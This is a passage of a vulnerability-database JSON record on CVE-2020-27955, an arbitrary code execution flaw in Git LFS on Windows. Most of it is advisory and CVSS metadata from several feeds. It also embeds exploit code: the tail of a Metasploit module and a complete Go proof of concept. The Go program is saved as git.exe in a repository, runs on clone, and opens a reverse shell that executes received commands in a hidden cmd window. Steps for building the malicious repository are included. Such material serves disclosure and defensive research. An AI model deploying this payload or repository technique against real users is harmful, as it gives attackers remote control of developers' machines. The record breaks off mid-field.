\nfail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response \nelse \nfail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request') \nend \n \nresponse \nend \n \ndef send_refs(req) \nfail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack' \n \nresponse = get_ref_discovery_response(req, @refs) \nfail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response \n \nresponse \nend \n \ndef send_requested_objs(req) \nupload_pack_resp = get_upload_pack_response(req, @git_objs) \nunless upload_pack_resp \nfail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response') \nend \n \nupload_pack_resp \nend \n \ndef exploit \nsetup_repo_structure \nsuper \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/164180/git_lfs_rce.rb.txt"}, {"lastseen": "2020-11-06T15:53:27", "description": "", "cvss3": {}, "published": "2020-11-06T00:00:00", "type": "packetstorm", "title": "git-lfs Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-06T00:00:00", "id": "PACKETSTORM:159923", "href": "https://packetstormsecurity.com/files/159923/git-lfs-Remote-Code-Execution.html", "sourceData": "`/* \nGo PoC exploit for git-lfs - Remote Code Execution (RCE) \nvulnerability CVE-2020-27955 \ngit-lfs-RCE-exploit-CVE-2020-27955.go \n \nDiscovered by Dawid Golunski \nhttps://legalhackers.com \nhttps://exploitbox.io \n \n \nAffected (RCE exploit): \nGit / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken / \nSmartGit / SourceTree etc. \nBasically the whole Windows dev world which uses git. \n \nUsage: \nCompile: go build git-lfs-RCE-exploit-CVE-2020-27955.go \nSave & commit as git.exe \n \nThe payload should get executed automatically on git clone operation. \nIt spawns a reverse shell, or a calc.exe for testing (if it \ncouldn't connect). \n \nAn lfs-enabled repository with lfs files may also be needed so that git-lfs \ngets invoked. This can be achieved with: \n \ngit lfs track \"*.dat\" \necho \"fat bug file\" > lfsdata.dat \ngit add .* \ngit add * \ngit commmit -m 'git-lfs exploit' -a \n \nCheck out the full advisory for details: \n \nhttps://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html \n \nhttps://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html \n \nPoC video at: \nhttps://youtu.be/tlptOf9w274 \n \n** For testing purposes only ** \n \n \n*/ \n \npackage main \nimport ( \n\"net\" \n\"os/exec\" \n\"bufio\" \n\"syscall\" \n) \n \n \nfunc revsh(host string) { \n \nc, err := net.Dial(\"tcp\", host) \nif nil != err { \n// Conn failed \nif nil != c { \nc.Close() \n} \n// Calc for testing purposes if no listener available \ncmd := exec.Command(\"calc\") \ncmd.Run() \nreturn \n} \n \nr := bufio.NewReader(c) \nfor { \nruncmd, err := r.ReadString('\\n') \nif nil != err { \nc.Close() \nreturn \n} \ncmd := exec.Command(\"cmd\", \"/C\", runcmd) \ncmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} \nout, _ := cmd.CombinedOutput() \nc.Write(out) \n} \n} \n \n// Connect to netcat listener on local port 1337 \nfunc main() { \nrevsh(\"localhost:1337\") \n} \n \n \n-- \nRegards, \nDawid Golunski \nhttps://legalhackers.com \nhttps://ExploitBox.io \nt: @dawid_golunski \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/159923/git-lfs-RCE-exploit-CVE-2020-27955.go.txt"}], "githubexploit": [{"lastseen": "2021-12-10T15:12:10", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-25T15:26:35", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-05-25T15:28:08", "id": "12E6F100-A1FF-594C-99C4-DB7C8CE01C78", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:28", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T09:38:48", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-05-02T15:22:19", "id": "4B231570-F0E2-58B6-8CC3-9375EA7D545C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T10:22:15", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T14:25:42", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-04-30T14:29:08", "id": "30298115-342F-55E1-9EAC-729DC1B3D181", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-16T09:22:22", "description": "# CVE-2020-27955\n\nThanks h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-24T02:40:04", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-08-16T07:21:56", "id": "DBF83092-127A-57DA-9F19-F1D868B01365", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-26T12:40:01", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (Go...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T16:43:04", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-07-26T06:31:01", "id": "161C23A4-C55D-51E1-879C-C0118D1D6700", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-13T23:00:37", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-03T17:14:22", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-08-13T17:42:30", "id": "FFCE0773-643A-5405-B466-F165D1B6EA7C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:58:56", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-10T21:31:24", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-02-11T07:12:46", "id": "8C51F794-A253-5F1E-B5D0-0B1213520826", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:00", "description": "# cve-2020-27955\ncve-2020-27955\n\n#### \u590d\u73b0\n1. \u521b\u5efagith...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-28T13:27:27", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-03-05T08:15:45", "id": "D56AA8A3-479D-504C-8FD5-DDF516063BD9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:20", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-02T12:32:08", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-08-02T13:13:28", "id": "FF9E9079-09ED-5DA5-A816-5FEB139C03E5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:46:09", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-13T10:30:28", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-05-13T10:33:03", "id": "78AAAA4C-FD3D-5AE7-B155-5E7646CA947E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "osv": [{"lastseen": "2022-05-11T20:43:33", "description": "### Impact\nOn Windows, if Git LFS operates on a malicious repository with a `git.bat` or `git.exe` file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\n\nThis occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\n\n### Patches\nThis version should be patched in v2.12.1, which will be released in coordination with this security advisory.\n\n### Workarounds\nOther than avoiding untrusted repositories, there is no workaround.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).\n* If you cannot open a discussion, please email the core team using their usernames at `github.com`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-11T23:39:18", "type": "osv", "title": "Git LFS can execute a Git binary from the current directory", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-04-20T16:25:04", "id": "OSV:GHSA-4G4P-42WC-9F3M", "href": "https://osv.dev/vulnerability/GHSA-4g4p-42wc-9f3m", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T20:43:33", "description": "### Impact\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\n\nThis is the result of an incomplete fix for CVE-2020-27955.\n\nThis issue occurs because on Windows, [Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator](https://github.com/golang/go/issues/38736).\n\n### Patches\nThis version should be patched in v2.13.2, which will be released in coordination with this security advisory.\n\n### Workarounds\nOther than avoiding untrusted repositories or using a different operating system, there is no workaround.\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n- Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).\n- If you cannot open a discussion, please email the core team using their usernames at `github.com`.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-15T00:30:37", "type": "osv", "title": "Git LFS can execute a Git binary from the current directory on Windows", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2022-04-20T16:24:41", "id": "OSV:GHSA-CX3W-XQMC-84G5", "href": "https://osv.dev/vulnerability/GHSA-cx3w-xqmc-84g5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:52", "description": "A remote code execution vulnerability exists in Git LFS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-28T00:00:00", "type": "checkpoint_advisories", "title": "Git LFS Remote Code Execution (CVE-2020-27955)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-28T00:00:00", "id": "CPAI-2020-1222", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-06-07T13:51:30", "description": "Git LFS 2.12.0 allows Remote Code Execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | Only affects git-lfs on Windows so Ubuntu is not affected.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T00:00:00", "type": "ubuntucve", "title": "CVE-2020-27955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-05T00:00:00", "id": "UB:CVE-2020-27955", "href": "https://ubuntu.com/security/CVE-2020-27955", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T13:33:08", "description": "Git LFS is a command line extension for managing large files with Git. On\nWindows, if Git LFS operates on a malicious repository with a git.bat or\ngit.exe file in the current directory, that program would be executed,\npermitting the attacker to execute arbitrary code. This does not affect\nUnix systems. This is the result of an incomplete fix for CVE-2020-27955.\nThis issue occurs because on Windows, Go includes (and prefers) the current\ndirectory when the name of a command run does not contain a directory\nseparator. Other than avoiding untrusted repositories or using a different\noperating system, there is no workaround. This is fixed in v2.13.2.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21237", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-01-15T00:00:00", "id": "UB:CVE-2021-21237", "href": "https://ubuntu.com/security/CVE-2021-21237", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-06T14:43:46", "description": "Git LFS 2.12.0 allows Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T15:15:00", "type": "cve", "title": "CVE-2020-27955", "cwe": ["CWE-427"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": 